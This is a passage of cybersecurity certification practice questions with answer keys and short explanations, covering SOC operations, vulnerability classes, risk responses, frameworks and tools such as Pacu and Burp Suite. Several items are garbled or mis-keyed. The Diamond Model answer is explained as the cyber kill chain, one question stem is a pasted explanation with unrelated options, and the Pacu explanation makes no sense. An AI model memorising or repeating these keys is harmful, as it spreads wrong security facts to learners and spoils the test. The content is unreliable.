C. Increased network agility for faster deployment of security controls D. Simplified network segmentation and isolation for easier threat containment SDN and virtualization network agility improve network security and facilitate faster deployment of security controls. SDN and virtualization allow the user to identify and respond to security threats more easily.

An HVAC company's web application allows users to schedule appointments with their HVAC technicians. The application only requires a 4-digit PIN to log in, and the web application sends the PIN over an unencrypted connection over port 80. What type of vulnerability does this situation describe? A. Cryptographic failures B. Broken access control C. Insecure design D. Software and data integrity failures

C. Insecure design Insecure design is a security vulnerability in which a system or application design allows attackers to exploit weaknesses or flaws in the design itself. A design using an unencrypted protocol for authentication is insecure.

A company hires a new employee to work in their IT department. The new employee quickly gains the trust of the other coworkers. However, the company soon notices someone is accessing files without authorization and leaking sensitive information. Which of the following best describes the security threat presented in this scenario? A. Social engineering attack B. Phishing attack C. Insider threat D. Malware attack

C. Insider threat This scenario is most reflective of an insider threat, which is someone who uses their position within a company to gain unauthorized access to information or systems.

A security analyst is conducting security operations for a company's network and notices that some users have complained about slow performance and high memory consumption on their devices. Which of the following is a potential cause of high memory consumption? A. Running multiple applications at the same time B. Running outdated operating system software C. Installing software from unverified sources D. Having insufficient disk space on the device

C. Installing software from unverified sources Installing software from unverified sources can introduce malware or other harmful programs that consume significant system resources, leading to slow performance and high memory consumption on devices.

A cybersecurity professional has identified malicious activity on a workstation within their organization. To effectively address the situation and prevent the spread of the threat, which of the following actions should the professional prioritize? A. Implement stronger password policies across the organization B. Conduct regular security audits to ensure compliance with data protection regulations C. Isolate the affected workstation from the network D. Re-image the affected workstation

C. Isolate the affected workstation from the network Isolating the affected workstation prevents the spread of the threat and allows for further investigation and remediation.

An electrical transmission substation operator observes a computer malfunction. Shortly thereafter, the terminal loses power, including the facility and the surrounding community. A subsequent investigation discovered that even though the system had an air-gapped network, an insider threat installed specially-designed malware on a key control system software. What type of network vulnerability has the insider threat exploited? A. External B. IoT C. Isolated D. Internal

C. Isolated An air-gapped network is another term for isolated, which means a disconnected network to the internet and other public networks.

A security researcher performs a scan on an isolated network not connected to the internet or any other external network. What is the CVSS score for this vulnerability in terms of Attack Complexity? A. Low B. Medium C. Not applicable D. High

C. Not applicable Scanning an isolated network does not relate to attack complexity; therefore, it does not apply to the Common Vulnerability Scoring System (CVSS). This scenario indicates an isolated network but gives no details on any vulnerabilities or exploits.

A front-end developer must harden security for the company's new web application. The developer notices that some vulnerabilities include broken authentication, cross-site scripting, and structured query language (SQL) injection attacks. Which of the following could provide resources to solve the issues afflicting the company's website? A. CIS benchmarks B. ISO 27000 series C. OWASP D. PCI DSS

C. OWASP Open Web Application Security Project (OWASP) is a charity and community organization that publishes several secure application development resources. Its mission is to provide free, open-source tools and resources to help developers and organizations create more secure applications and services.

An information security project manager needs to find resources that promote awareness of web application security issues and develop resources to educate developers and users. In addition, the project manager is looking for these resources to offer various testing tools to help organizations identify and fix security vulnerabilities. Which of the following resources would be best for the project manager to use? A. CIS benchmarks B. ISO 27000 series C. OWASP D. PCI DSS

C. OWASP Open Web Application Security Project (OWASP) is a charity and community organization that publishes several secure application development resources. Its mission is to provide free, open-source tools and resources to help developers and organizations create more secure applications and services.

An information security project manager of a large software firm is in charge of researching alternative vulnerability scanners for the security operations center's (SOC's) reduced budget. At the next stakeholder meeting, the manager proposes several free, open-source software (FOSS). Which of these vulnerability scanners fits the needs of the enterprise business? (Select the two best options.) A. Qualys B. Nessus C. OpenVAS D. OpenSCAP

C. OpenVAS D. OpenSCAP The OpenVAS scanner (openvas.org) is open-source software initially developed from the Nessus codebase before Nessus became commercial software. The cost efficiency of the open-source scanner, while maintaining the ability to assess CVSS scoring abilities, makes OpenVAS optimal for this scenario. OpenSCAP is an open-source scanner used to identify system vulnerabilities. It also provides the ability to calculate a Common Vulnerability Scoring System (CVSS) score based on the vulnerabilities identified in the system.

A security team found an unidentified device linked to the company's network. The team believes that the device could be a rogue one, and they intend to perform scans and sweeps to identify and eliminate any unauthorized devices on the network. Which two options are the most effective methods of scans or sweeps used to detect rogue devices on a network? (Select the two best options.) A. Port scanning B. Network mapping C. Passive scanning D. Active scanning

C. Passive scanning D. Active scanning Passive scanning is a method that listens to network traffic without actively sending traffic. It can detect rogue devices that are active on the network but not responding to standard requests. Active scanning is a method that sends traffic to a network to identify devices that are active on the network. It is an effective method for identifying rogue devices actively responding to requests.

A mid-sized company wants to incorporate e-commerce to improve sales. The company has decided to hire an information security consultant to assist in bolstering security measures in preparation for the company's new changes. The consultant focused on the potential risk associated with storing and processing bank information. What information security standard is the consultant concentrating efforts on? A. NIST Cybersecurity Framework (CSF) B. International Organization for Standardization (ISO) 27000 series C. Payment Card Industry Data Security Standard (PCI DSS) D. General Data Protection Regulation (GDPR)

C. Payment Card Industry Data Security Standard (PCI DSS) Payment Card Industry Data Security Standard (PCI DSS) ensures that companies that handle, process, or store cardholder data do so securely. As a result, the consultant focuses on these standards most when preparing the company for e-commerce standards.

The security operations center (SOC) manager has ordered an analyst to fingerprint some of a new client's systems. Which of the following aligns most with performing fingerprinting as the SOC manager requested? A. Perform a set of processes on how much information can be extracted from delivered software B. Perform a scan identifying devices connected to a network or network segment C. Perform a scan looking to focus attention on individual devices to better understand their purpose D. Perform a scan identifying and assessing the vulnerabilities that malicious attackers can exploit on/in the systems

C. Perform a scan looking to focus attention on individual devices to better understand their purpose Device fingerprinting describes the effort taken to identify details about a device more precisely. While a map or discovery scan looks for connected devices, a fingerprint scan focuses attention on an individual device.

A company conducted a web vulnerability assessment on its web applications and identified several security issues. The company now needs suitable techniques to analyze the assessment output to respond to potential threats and indicators of compromise (IoC). Which techniques would most effectively analyze web vulnerability assessment output in detecting IoCs? A. Implementing network segmentation B. Deploying a web application firewall (WAF) C. Performing data and log analysis D. Using a security information and event management (SIEM) solution

C. Performing data and log analysis Data and log analysis are effective for analyzing web vulnerability assessment output. Reviewing logs and system data helps identify patterns and anomalies that may indicate IoCs, enabling the organization to respond appropriately to potential threats.

A cybersecurity professional has identified a potential security incident that involves sensitive data. To effectively communicate with the legal department and protect the organization's interests, which of the following actions should the professional prioritize when dealing with the data in question? A. Encrypt all sensitive data and distribute it to key stakeholders for review B. Require all team members to sign non-disclosure agreements (NDAs) before accessing the data C. Place a legal hold on the relevant data and inform the legal department D. Conduct an internal investigation without informing the legal department

C. Place a legal hold on the relevant data and inform the legal department A legal hold ensures the organization preserves sensitive data for potential legal proceedings. Informing the legal department allows them to take appropriate actions and maintain effective communication throughout the process.

An organization is improving its incident response plan to ensure its cybersecurity team can efficiently handle security incidents. They decide to develop playbooks to guide the team's actions during various types of incidents. How can incorporating playbooks into the incident response plan help the organization maintain operational visibility during a security event? A. Facilitate clear communication among team members using playbooks B. Ensure proper documentation of incident handling processes C. Provide step-by-step instructions to address specific incidents D. Enable faster incident identification and containment

C. Provide step-by-step instructions to address specific incidents Incorporating playbooks into the incident response plan helps maintain operational visibility during a security event by providing step-by-step instructions that allow the cybersecurity team to handle various types of incidents efficiently.

A cloud administrator has to perform regulatory compliance checks on a legal office's cloud instances and evaluate the office's cloud infrastructure against the Center for Internet Security (CIS) Benchmarks for Amazon Web Services (AWS). Which of the following tools would the administrator most likely use to easily carry out the tasks? A. Pacu B. ScoutSuite C. Prowler D. Metasploit Framework

C. Prowler Prowler is an audit tool for use with AWS only. It can evaluate a cloud infrastructure against the CIS Benchmarks for AWS and perform regulatory compliance checks.

A company's website allows users to upload files stored on the server for other users to download. An attacker uploads a specially crafted file that contains malicious code, and the server does not properly validate the file. As a result, when other users download the file, the malicious code gets executed on their system. What type of vulnerability does this situation describe? A. XSS B. CSRF C. RCE D. SSRF

C. RCE Remote code execution (RCE) is a security vulnerability where an attacker remotely executes arbitrary code or commands on a targeted system or application, allowing unauthorized system access or use.

An online retailer permits users to search for products on their website. An attacker decides to take advantage of their search feature by injecting a malicious script into the search bar. When a user types in a search query that triggers the injection, it mirrors the script back to the user's browser and executes it, allowing the attacker to steal the user's session token. What type of attack is this? A. Persistent XSS B. Directory traversal C. Reflected XSS D. File inclusion

C. Reflected XSS The attacker is using reflected cross-site scripting (XSS) to steal the user's session token. In reflected XSS, the malicious script gets reflected off a web application and executed on the victim's browser, embedding the malicious script in the URL

An information security manager is creating a compliance report that will include data on policies and procedures, audit results, employee training, and gap analysis. What is the company promising to follow? A. Security baselines B. Sensitivity levels C. Regulatory requirements D. Operations

C. Regulatory requirements The laws, policies, contracts, or regulations mandate the compliance report, dictating regulatory requirements. Compliance reports help ensure that the company is following legal and regulatory requirements.

The "intruder" feature of the Burp Suite can provide an output of vulnerable elements on a web page displayed on the suite's integrated browser. Using default settings, how can an administrator quickly identify which login page elements, for example, are potentially vulnerable? A. Review items in the history tab B. Review items in the issues section C. Review items highlighted in green D. Review the last item listed on the command line window

C. Review items highlighted in green The Burp Suite tool's "intruder" tab provides a section for payload positions that can reveal vulnerable elements of a page highlighted in green.

The chief information security officer (CISO) for a large pharmaceutical corporation receives a report that a hacktivist has vandalized one of the company's web servers due to an authentication flaw at the server level. As an organizational leader working to prevent future incidents, what should be the CISO's top priority? A. Identifying the attacker's network details and then launching a counterattack to prevent further compromise B. Notifying upper management and pre-emptively releasing a statement to prevent damage to the company's reputation C. Reviewing the company's service-level objectives and incident response plan to ensure that they are in keeping with industry best practices D. Analyzing the extent of the damage and restoring the server to its original state

C. Reviewing the company's service-level objectives and incident response plan to ensure that they are in keeping with industry best practices Service-level objectives (SLOs) provide a benchmark by which security operations can measure their performance and help ensure they meet leadership's expectations. Service-level objectives must be measurable, achievable, and realistic, like any goal-setting initiative. A CISO works at the level of service-level objectives, so reviewing the current SLOs constitutes a suitable answer to prevent future incidents.

A financial institution considers partnering with a new vendor to provide online payment services to its customers. The vendor has a reputation for delivering reliable and secure services; however, the financial institution wants to ensure that they make an informed decision. What metric could the institution use to assess the security risk associated with this partnership? A. Recurrence of attacks against the vendor B. Mitigations required from previous attacks C. Risk score D. Affected hosts

C. Risk score The risk score estimates the impact and likelihood of a threat actor exploiting a vulnerability before an attack. It is suitable for estimating the probability of issues with a vendor.

A large organization recently suffered a significant cyberattack that disrupted daily operations. The management team is reviewing the incident and wants to improve its business continuity and disaster recovery strategies, with a focus on patch management concepts. Which patch management best practices should the organization execute to increase its BC/DR preparedness? A. Centralized patch management system B. Updates prioritized by vendor suggestions C. Risk-based prioritization of patches D. Integration of patch management with change management processes

C. Risk-based prioritization of patches A risk-based approach to patch prioritization helps ensure that the organization addresses the most critical vulnerabilities first, reducing the overall risk and improving the organization's resilience to cyberattacks or other disasters.

An analyst working for a financial institution has implemented both security orchestration, automation, and response (SOAR) and security information and events manager (SIEM) solutions to enhance their security posture. The analyst receives an alert from the SIEM solution about a potential security threat, and the SOAR solution is triggered to respond to the incident. What is the key difference between SOAR and SIEM solutions in a security operations environment, as shown in the scenario above? A. SOAR solutions are for network traffic monitoring, while SIEM solutions are for incident response. B. SOAR solutions are for threat intelligence analysis, while SIEM solutions are for vulnerability assessment. C. SOAR solutions are for automated incident response, while SIEM solutions are for collecting and analyzing security data. D. SOAR solutions are for user authentication, while SIEM solutions are for data encrypti

C. SOAR solutions are for automated incident response, while SIEM solutions are for collecting and analyzing security data. The security information and event management (SIEM) solution alerts the analyst of a potential security threat, while the security orchestration, automation, and response (SOAR) solution responds to the incident. The key difference between SOAR and SIEM solutions is that SOAR solutions are for automating incident response, while SIEM solutions are for collecting and analyzing security data.

A home furniture company has tasked a cybersecurity analyst to conduct an assessment of their deep-packet inspection firewall's ability to halt brute-force password attacks across the screened subnet. As they begin their testing, they try to bypass the security control by entering a series of random characters into the password field. What is the analyst attempting to do? A. Adversary emulation B. Threat modeling C. Security control testing D. Attack surface reduction

C. Security control testing Performing security control testing to ensure controls are working correctly is crucial. However, the security analyst is testing a specific control, not completing a comprehensive test against a network.

A human resources outsourcing company considers outsourcing its IT infrastructure to a cloud service provider. The company is concerned about the potential for downtime and its impact on its business. What is the best way to mitigate the risk of downtime? A. Organizational governance B. Configuration management C. Service-level agreement (SLA) D. Memorandum of understanding (MoU)

C. Service-level agreement (SLA) A service-level agreement (SLA) is a legally binding contract between two or more parties that defines the level of service and governs the relationship with a third-party service provider. SLA is suitable to guarantee a level of uptime.

When using the Metasploit web interface for brute force exploits, what can a security administrator review to determine the number of compromised targets in the attack and whether the target shows a "Failed" or "Succeeded" result? A. Web detect section B. Task log section C. Statistics section D. Repeater section

C. Statistics section The statistics section of the brute force module can track real-time information regarding the total number of login attempts, compromised targets, and even successful logins.

The IT department of a company has identified significant risks to a critical piece of business software. There are no available controls to alleviate the software's vulnerability, but the business will lose all revenue sources without this software. What is the best course of action? A. Take no further action as the software is critical to operations B. Uninstall the vulnerable software to prevent exploitation C. Submit a formal request for a risk management exception D. Mitigate the vulnerability

C. Submit a formal request for a risk management exception A risk management exception is a formal process that permits an organization to acknowledge non-compliance with security policies or standards to allow an activity to occur. Risk management exceptions are suitable for critical business processes with no available controls.

Which security control category do systems primarily implement? A. Preventative B. Managerial C. Technical D. Operational

C. Technical A system (hardware, software, or firmware) implements technical controls (a control category). For example, firewalls, antivirus software, and operating system (OS) access control models are technical controls. Technical controls are also known as logical controls.

A golf services company is planning to implement a critical security patch to address a known vulnerability in their bookings system. What is the best way to ensure that the patch does not cause any unintended consequences or disruptions to the system? A. Rollback B. Implementation C. Testing D. Validation

C. Testing Patch testing evaluates patches or configuration changes on a test system or environment to ensure they do not cause unintended consequences or disruptions.

A company's IT security team discovers that one of their servers is experiencing a significant increase in drive capacity consumption. Upon investigating, the team identifies several malicious processes running in the background. Which of the following best explains the relationship between drive capacity consumption and malicious processes in this scenario? A. The server's drive capacity consumption is causing the malicious processes to run in the background, potentially due to insufficient storage space. B. The malicious processes and the increased drive capacity consumption are unrelated, and the issue could be caused by a hardware failure. C. The malicious processes are causing the server to use up more drive capacity than usual, potentially for data exfiltration purposes. D. The server's operating system is corrupted, causing both the increased drive capacity consumption and the malicious processes to occur.

C. The malicious processes are causing the server to use up more drive capacity than usual, potentially for data exfiltration purposes. The malicious processes could be causing the server to use up more drive capacity than usual, potentially for the purpose of data exfiltration.

A cyber security team is in the process of correlating threat data from network logs, endpoints, and intelligence feeds. Which of the following best describes the actions they are undertaking? A. Data enrichment B. Essential strategy C. Threat feed combination D. Preemptive actions

C. Threat feed combination Threat feed combination refers to the process of collecting and merging multiple sources of threat intelligence feeds into a unified view.

Which of the following are true about the importance of time synchronization, configuration file locations, and logging files in security operations? (Select the two best options.) A. Configuration file locations are typically easy to find and are consistent across different operating systems. B. Time synchronization is only important for Windows-based operating systems. C. Time synchronization is crucial for ensuring consistency in event logs. D. Logging files can provide valuable information for identifying and investigating security incidents.

C. Time synchronization is crucial for ensuring consistency in event logs. D. Logging files can provide valuable information for identifying and investigating security incidents. Time synchronization is important because it accurately records events in the correct order across all systems and devices, which is critical for forensic analysis of security incidents. Logging files can provide important information for identifying and investigating security incidents, including information on system and user activity, network traffic, and more.

What is the main purpose of a memorandum of understanding (MoU)? A. To outline the services provided by a third-party service provider B. To legally bind two or more parties to an agreement C. To ensure all parties involved in an agreement understand each other's expectations and obligations D. To protect both parties involved in a service-level agreement

C. To ensure all parties involved in an agreement understand each other's expectations and obligations A memorandum of understanding (MoU) is a legal document that outlines the terms and conditions of an agreement between two or more parties.

A security analyst is researching an incident that has affected their organization's web server. The analyst must understand the attacker's tactics, techniques, and procedures (TTPs) to prevent future incidents. Which of the following should the analyst prioritize to study and apply attack methodology frameworks effectively? A. Implementing a business continuity (BC)/disaster recovery (DR) plan B. Conducting security awareness training C. Utilizing threat intelligence tools D. Performing root cause analysis

C. Utilizing threat intelligence tools Threat intelligence tools help the security analyst collect and analyze data related to attack methodologies, TTPs, and threat actors.

When trying to exploit an Amazon Web Services (AWS) account using the Pacu exploitation tool, the security administrator receives the following line: Found role: arn:aws:iam::896747040350:role/Admin. Which of the following modules is the security administrator running at this time? A. exploit/windows/ssh/sysax_ssh_username B. iam_enum_permissions C. iam_enum_roles D. recon/domains-contacts/whois_pocs

C. iam_enum_roles The security administrator is running the iam_enum_roles module, which remotely discovers roles based on a dictionary attack using the Pacu exploitation tool. The exploit is successful if the tool finds a role(s).

A new supervisor tasked a cybersecurity analyst with implementing a solution that includes a set of protocols and tools for building software applications that enables them to communicate with other applications, platforms, or services. What task has the supervisor assigned to the cybersecurity analyst to implement? A. Plugins B. Webhooks C. SDN D. APIs

D. APIs Application programming interfaces (APIs) are a set of protocols and tools that allow software applications to communicate with each other. APIs enable developers to build applications that can access and use the functionality of other applications, platforms, or services.

An external security team was able to gain a session token to one of the user accounts to carry out other vulnerability tests on an AWS account almost immediately after using the Pacu security tool. As a result, the team could continue their work for about an hour uninterrupted. Which of the following best describes the most alarming conclusion from this security test case? A. The web IAM dashboard shows findings. B. Domain POCs is publicly known. C. Public entities are easily mapped for social engineering. D. Access was granted without knowing passwords.

D. Access was granted without knowing passwords. The Pacu tool's iam_enum_roles module remotely discovers roles based on a dictionary attack. The session token, in this case, assumes that the accounts have dictionary passwords and are easy to threat actors.

A company has hired a red team to simulate the tactics, techniques, and procedures of APT 1337, a Malaysian profit-focused hacker syndicate, against their network. As they attempt to gain access to the company's systems, they use APT 337's signature combination of social engineering techniques, data protection bypasses, and technical exploits to bypass security controls. What activity is the red team conducting? A. Penetration testing B. Security control testing C. Output encoding D. Adversary emulation

D. Adversary emulation Adversary emulation involves simulating a real-world cyber attack by an actual adversary to assess an organization's defenses.

A soap product conglomerate's security system generates a large number of Security Information and Event Management (SIEM) notifications to administrators within a short period. What metric does this refer to? A. Mean time to detect B. Mean time to respond C. Mean time to remediate D. Alert volume

D. Alert volume Alert volume is the number of security alerts a system or tool generates over a specified period. Security Information and Event Management (SIEM) notifications to administrators are synonymous with alerts.

A security analyst at a software development company must identify network threats. They recently discovered a misconfigured server. What should the analyst focus on to secure network and system architecture? A. Implementing industry best practices B. Monitoring network traffic C. Investigating physical security measures D. Assessing attack stage and web application vulnerabilities

D. Assessing attack stage and web application vulnerabilities The analyst should prioritize understanding if an attacker has exploited the misconfigured server, determining the possible attack stage, and evaluating web application vulnerabilities. This focus aligns with the objectives of the cyber kill chain model and the Open Web Application Security Project (OWASP) Testing Guide.

A transport network company that provides private taxi cab services has a web application that allows customers to schedule appointments with their driver. The application runs on outdated software and represents a security risk, but the software is also critical for business operations. The company decides to discontinue using this software given the risks that it entails, instead electing to run tasks manually using Excel spreadsheets. What kind of risk response does this represent? A. Mitigation B. Acceptance C. Transference D. Avoidance

D. Avoidance Risk avoidance often refers to stopping an activity that is risk-bearing. For instance, a private cab service may stop offering a route to a dangerous neighborhood if it continues experiencing violent crime. Avoidance is suitable when the activity is unnecessary, or the risk is too great.

The solutions architect is in charge of assembling the initial security configuration of various systems on the network, such as Mac, Windows, UNIX, and Linux. Where would the architect look for configuration guidelines to cover these different systems? A. Open Web Application Security Project (OWASP) B. International Organization for Standardization (ISO) 27000 series C. Cloud Security Alliance (CSA) D. Center for Internet Security (CIS) benchmarks

D. Center for Internet Security (CIS) benchmarks The Center for Internet Security (CIS) benchmarks provide a secure baseline configuration for various operating systems, applications, and hardware devices. The CIS Benchmark is a broad set of over 100 configuration guidelines covering different aspects of IT security.

When using the Angry IP Scanner, how would a network security officer determine if a number of devices on the network are accessible via TELNET? A. Check IP address range B. Check description in visualization tool C. Check for web detect D. Check for port 23

D. Check for port 23 TELNET is transmission control protocol/internet protocol (TCP/IP) port 23. The security officer searches for all devices in the tool with port 23 listed to determine which devices have a TELNET port open.

A company has implemented a new security control requiring employees to use two-factor authentication to log in to their workstations. However, many employees are experiencing difficulty using the new authentication process, affecting productivity. What type of controls should the company consider implementing to address this issue? A. Preventative B. Technical C. Managerial D. Compensating

D. Compensating Compensating controls serve as a substitute for a principal control, offering the same or better level of protection compared to a principal control. The implemented principal control is not working well, making compensating controls the best answer.

A multinational corporation wants to enhance its incident response capabilities and ensure continuous improvement in the process. What should the security operations center (SOC) focus on to achieve this objective? A. Reviewing playbooks B. Conducting security training C. Implementing a threat intelligence program D. Conducting post-incident reviews

D. Conducting post-incident reviews Post-incident reviews involve analyzing the incident response process, identifying areas of improvement, and implementing changes to enhance the team's effectiveness in handling future incidents.

A multinational corporation has tasked a security analyst with improving the organization's incident response capabilities. What should the analyst focus on to best enhance the team's ability to respond to security incidents? A. Developing playbooks B. Performing regular vulnerability scans C. Implementing security awareness training D. Conducting tabletop exercises

D. Conducting tabletop exercises Tabletop exercises help the incident response team practice and evaluate their response to simulated incidents, enhancing their preparedness and response capabilities.

A network security analyst at an organization must enhance the detection of suspicious activity within the organization's network. The analyst considers implementing various techniques to accomplish this goal. What is most effective in helping the analyst identify potential network indicators of compromise? A. Conducting regular employee training sessions B. Deploying a vulnerability scanner tool C. Participating in tabletop exercises D. Continuous network traffic monitoring and analysis

D. Continuous network traffic monitoring and analysis Continuous network traffic monitoring and analysis allows the network security analyst to detect and identify potential indicators of compromise by observing network activity and identifying any unusual patterns or behaviors.

A company is debating alternative methods for vulnerability scans due to the multiple attempts made on the company's network. The attempts have occurred over the previous year. Which of these methods will provide the most comprehensive evaluation of company devices? A. Non-credentialed B. Agent C. Agentless D. Credentialed

D. Credentialed Credentialed scans provide the most comprehensive evaluation of devices. By authenticating to the device, the scanner can enumerate all installed software, the file system, configuration data, user accounts, and many other attributes.

A company stores sensitive data on their servers and uses encryption to protect it. However, the encryption algorithm is outdated and has known vulnerabilities. What type of vulnerability does this situation describe? A. Broken access control B. Security misconfiguration C. XSS D. Cryptographic failures

D. Cryptographic failures Cryptographic failures describe vulnerabilities in encryption or cryptographic systems that permit compromising the confidentiality of encrypted data.

A security analyst is evaluating the effectiveness of their organization's incident response process. They need to understand the stages of an attack and have a framework that aids in understanding the relationships between the adversary, infrastructure, and capabilities of the attack. Additionally, the analyst wants to ensure that they properly address vulnerability reporting outcomes and action plans. Which frameworks should the analyst focus on to achieve these objectives? A. Open Source Security Testing Methodology Manual (OSSTMM) B. Cyber kill chain C. MITRE ATT&CK D. Diamond Model of Intrusion Analysis

D. Diamond Model of Intrusion Analysis The cyber kill chain allows the analyst to identify potential weaknesses in their defenses and develop appropriate action plans.

An organization's security team is conducting routine system checks and discovers an unauthorized scheduled task on a critical server. Further investigation reveals that the task is set to run every hour, and the task is not part of any known system or application updates. What is the best course of action for the security team to take in response to the unauthorized scheduled task on the critical server? A. Allow the task to run and gather more information before taking any action B. Immediately shut down the critical server to prevent any further unauthorized access C. Schedule a maintenance window to investigate the task at a later time D. Disable the task and monitor the server for any further suspicious activity

D. Disable the task and monitor the server for any further suspicious activity To prevent any further suspicious activity and protect the critical server, the security team should disable the unauthorized scheduled task.

An analyst reviews an alert detecting a rogue backend server deployed behind the company's load balancer. After the analyst attempts to identify the possible threat, the screened subnet firewall blocks the action. What process was the analyst using to identify where the connection the device was on the network? A. Vulnerability scan B. Device fingerprinting C. Dynamic analysis D. Discovery scan

D. Discovery scan A map, or discovery, scan identifies the devices connected to a network or network segment.

Where can a security analyst go on the Arachni web user interface (UI) to load balance the work on scanning multiple URL targets from remote machines? A. Profiles section B. Extender section C. Target section D. Dispatcher's section

D. Dispatcher's section The security analyst goes to the dispatcher's section of Arachni. It allows the analyst to load balance workloads by adding or assigning remote machines to perform the scans.

A security analyst has to review the Amazon Web Service (AWS) compute instances for an organization and report security findings. Where would the analyst find a list of all such findings when using the ScoutSuite auditing tool? A. Recommendation column B. Assessment summary C. IAM dashboard D. EC2 dashboard

D. EC2 dashboard The EC2 dashboard is the appropriate place to find findings for compute instances. AWS EC2 is a compute service on the cloud platform.

A cybersecurity professional needs to address compliance requirements related to data preservation and handling sensitive information during an investigation. Which of the following actions should the professional prioritize to ensure the organization meets these requirements while dealing with the data in question? A. Distribute the data to multiple team members for redundancy purposes B. Store all organizational data on encrypted devices with limited access C. Provide the relevant data to the legal department for immediate action D. Establish a chain of custody and place a legal hold on the relevant data

D. Establish a chain of custody and place a legal hold on the relevant data Establishing a chain of custody ensures proper handling and documentation of sensitive data throughout the investigation. Implementing a legal hold preserves the data for potential legal proceedings, helping the organization comply with the requirements.

A cybersecurity professional must address compliance requirements related to data preservation and handling sensitive information during an investigation. What actions should the professional prioritize? A. Distribute data to multiple team members B. Store data securely with limited access C. Provide relevant data to legal department D. Establish chain of custody and legal hold

D. Establish chain of custody and legal hold Establishing a chain of custody ensures proper handling and documentation of sensitive data throughout the investigation. Implementing a legal hold preserves the data for potential legal proceedings, helping the professional comply with the requirements.

A security analyst encounters a vulnerability relating to a web server at IPv4 address 42.32.59.252. This web server is inside the network's screened subnet, and the vulnerability pertains to an outdated version of a service running on port 443. What type of network vulnerability has the security analyst discovered? A. Internal B. Isolated C. SCADA D. External

D. External External refers to an attack originating from outside a network, generally from the internet. For example, the IPv4 address 42.32.59.252 refers to a public IP address that originates externally.

A security information and event management (SIEM) system flags a failed remote secure shell (SSH) attempt as suspicious and alerts the security team. Upon investigation, the team determines that the SSH attempt is from a legitimate source. What is the type of error in this situation? A. True positive B. False negative C. True negative D. False positive

D. False positive False positives occur when a vulnerability scan incorrectly indicates that a vulnerability or misconfiguration is present when it is not. Identifying and managing false positives is important to reduce the time spent researching and validating them and to increase the accuracy of scan results.

An attacker knows that a web application's credentials database stores passwords as CRC hashes. The attacker then uses a rainbow table of all CRC hashes to assist in a hash collision attack, causing identical hashes that facilitate access without needing to know the victim's actual password. What vulnerability has caused this situation? A. Broken access control B. Software and data integrity failures C. Cryptographic failures D. Identification and authentication failures

D. Identification and authentication failures Identification and authentication failures are security vulnerabilities where systems or applications fail to verify user identity, allowing unauthorized access properly. This failure can result from weak or easily guessable passwords, lack of multifactor authentication, or insufficient verification of credentials. Cyclic redundancy check (CRC) hashes are weak, making this an authentication failure.

To enhance the security of a software company, a cybersecurity analyst is tasked with devising a new patch management process. The analyst must conduct a thorough analysis in response to a recent cyber attack on the company's network. When working on the patch management plan, what should the analyst prioritize? A. Tracing attacker infrastructure B. Assessing attacker skills C. Analyzing victim traits D. Identifying and prioritizing vulnerabilities

D. Identifying and prioritizing vulnerabilities When implementing a patch management process, the primary objective is identifying and prioritizing vulnerabilities in the organization's software and systems. Following the OWASP Testing Guide, the analyst can ensure that the patch management process aligns with industry best practices and helps improve the organization's security posture.

The company's login page needs testing after their cyber security engineer implemented hardening techniques. As a result, its penetration testing team assigned the website specialist to perform some tests to ensure the changes were stable. What specifically is the specialist attempting when using fuzzing tools to perform the tests? A. Extracting source code, and identifying software methods and languages used B. Focusing attention on the individual webserver to better understand its purpose towards the website C. Retrieving data and inspecting source code to identify vulnerabilities in programming techniques, via static analysis D. Identifying problems and issues with the webpage by purposely inputting or injecting malformed data

D. Identifying problems and issues with the webpage by purposely inputting or injecting malformed data A fuzzer is a tool that automatically generates and injects malformed data. The specialist is using the tool to identify problems and issues with an application by purposely inputting or injecting malformed data.

A large corporation is facing legal action due to a recent data breach. The corporation must preserve relevant digital evidence and maintain the chain of custody as part of the ongoing investigation. The corporation considers implementing identity and access management (IAM) solutions to improve its security posture. Which IAM practice would also contribute to preserving the chain of custody during the corporation's legal hold period? A. Use single sign-on (SSO) technology B. Enable multi-factor authentication (MFA) C. Perform regular password audits D. Implement a role-based access control system

D. Implement a role-based access control system Role-based access control systems assign permissions based on predefined roles, ensuring that only authorized personnel can access sensitive data.

A cybersecurity analyst at a large organization is working on improving their techniques for identifying malicious activity in the company's network. The analyst is considering several methodologies and frameworks to help them achieve this objective. Which actions should the analyst prioritize to enhance their ability to detect and respond to potential threats? A. Deploy additional firewalls throughout the network B. Implement stronger password policies C. Conduct regular penetration testing of web applications D. Implement network traffic analysis and threat hunting

D. Implement network traffic analysis and threat hunting Network traffic analysis and threat hunting, guided by frameworks like Open Source Security Testing Methodology Manual (OSSTMM) and MITRE ATT&CK, can help the analyst identify potential malicious activity.

A healthcare facility tasked a cybersecurity analyst with recommending controls to mitigate successful application attacks. Which of the following controls should the analyst prioritize to help protect the application and prevent future attacks? A. Conducting regular vulnerability assessments B. Conducting a thorough code review C. Implementing remediation measures D. Implementing compensating controls

D. Implementing compensating controls Implementing compensating controls can help mitigate successful application attacks by addressing the specific risks and vulnerabilities that allowed the attacks to succeed.

A network reliability engineer for a commercial dairy company receives an alert from the sensor in refrigeration unit 7. It shows the cooler as 15 degrees higher than usual, and the backup refrigeration units are working at max capacity to control the increase in temperature. The engineer alerts the floor manager on shift to distribute inventory to nearby coolers and send a maintenance specialist to resolve the issue. What type of controls saved the company's inventory from a catastrophe? A. Regulatory requirements B. Security information and event management (SIEM) C. Action Plan D. Industrial control systems (ICSs)

D. Industrial control systems (ICSs) The industrial control system (ICS) in place stopped the inventory from spoiling and gave company employees the time necessary to respond to the problem at hand. In this scenario, the sensor was the ICS (a computer system designed to perform a specific, dedicated function).

A security administrator is testing their organization's database server, which services a publicly accessible web application server. The security administrator sends unexpected input combined with arbitrary commands to the web application to determine whether the database server is vulnerable. What kind of vulnerability is the security administrator testing? A. Cryptographic failures B. Broken access control C. Software and data integrity failures D. Injection flaws

D. Injection flaws The security administrator is testing injection flaws. Injection refers to inserting malicious code or commands into a program or system, such as a Structured Query Language (SQL) injection, allowing attackers to access or modify data they are not authorized to access or modify.

The attacker is using reflected cross-site scripting (XSS) to steal the user's session token. In reflected XSS, the malicious script gets reflected off a web application and executed on the victim's browser, embedding the malicious script in the URL A. Availability B. Confidentiality C. Privacy D. Integrity

D. Integrity The impact of vulnerability considers the potential damage caused by successful exploitation and the effort required to mitigate it. Integrity issues extended to when the system's functionality changed or got impaired (i.e., modification of database records).

An organization tasked its cybersecurity team leader with addressing a security incident that requires immediate action. What steps should the team take to prevent additional damage to the systems as part of their security operations plan? A. Notify all employees B. Install security updates on all systems C. Conduct a security audit D. Isolate affected systems

